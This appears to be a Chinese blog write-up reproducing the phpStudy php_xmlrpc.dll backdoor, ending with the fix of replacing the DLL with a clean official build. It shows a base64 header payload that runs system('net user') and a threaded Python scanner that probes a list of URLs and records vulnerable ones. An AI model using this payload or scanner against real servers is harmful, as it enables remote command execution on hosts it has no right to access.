phpstudy后门漏洞复现
phpstudy介绍
Phpstudy是国内的一款免费的PHP调试环境的程序集成包,其通过集成Apache、PHP、MySQL、phpMyAdmin不同版本软件于一身,一次性安装无需配置即可直接使用,具有PHP环境调试和PHP开发功能。
影响版本
后门验证
PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll存在@eval(%s('%s'));即说明有后门。
漏洞复现
访问:http://10.10.10.19,用burpsuit进行抓包拦截:
在请求头里添加accept-charset: c3lzdGVtKCduZXQgdXNlcicpOw==,其中,c3lzdGVtKCduZXQgdXNlcicpOw==为system('net user');的base64编码转换;
注意:要把gzip, deflate里逗号后面的空格去掉,不然命令执行不成功。
python自动化扫描
附上poc:
import base64
import requests
import threadpool
def write_shell(url):
payload = "echo \"littlebin404\";"
payload = base64.b64encode(payload.encode('utf-8'))
payload = str(payload, 'utf-8')
headers = {
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
'Accept-Language': 'zh-CN,zh;q=0.9',
'accept-charset': payload,
'Accept-Encoding': 'gzip,deflate',
'Connection': 'close',
}
try:
r = requests.get(url=url+'/index.php', headers=headers, verify=False,timeout=30)
if "littlebin404" in r.text:
print (' BackDoor successful: '+url+'\n')
with open('success.txt','a') as f:
f.write(url+'\n')
else:
print ('[ - ] BackDoor failed: '+url+'[ - ]\n')
except:
print ('[ - ] Timeout: '+url+' [ - ]\n')
def main():
with open('D://url.txt','r') as f:
lines = f.read().splitlines()
task_pool=threadpool.ThreadPool(5)
requests=threadpool.makeRequests(write_shell,lines)
for req in requests:
task_pool.putRequest(req)
task_pool.wait()
if __name__ == '__main__':
main()
运行结果:
另外,会把url记录在success.txt文件中;
漏洞修复
phpStudy启动时默认加载php-5.4.45版本的PHP,该版本存在后门,可以从PHP官网下载原始php-5.4.45版本或php-5.2.17版本,替换其中的php_xmlrpc.dll,下载地址:
https://windows.php.net/downloads/releases/archives/php-5.2.17-Win32-VC6-x86.zip
https://windows.php.net/downloads/releases/archives/php-5.4.45-Win32-VC9-x86.zip
至此,漏洞复现成功!!相信很多搞web的都用过phpstudy,看到这个后门漏洞吃不吃惊,意不意外呢?看了师傅们的复现,疯狂验证一波。
8月份已发布phpstudy V8.0,亲测贼好用,界面很酷!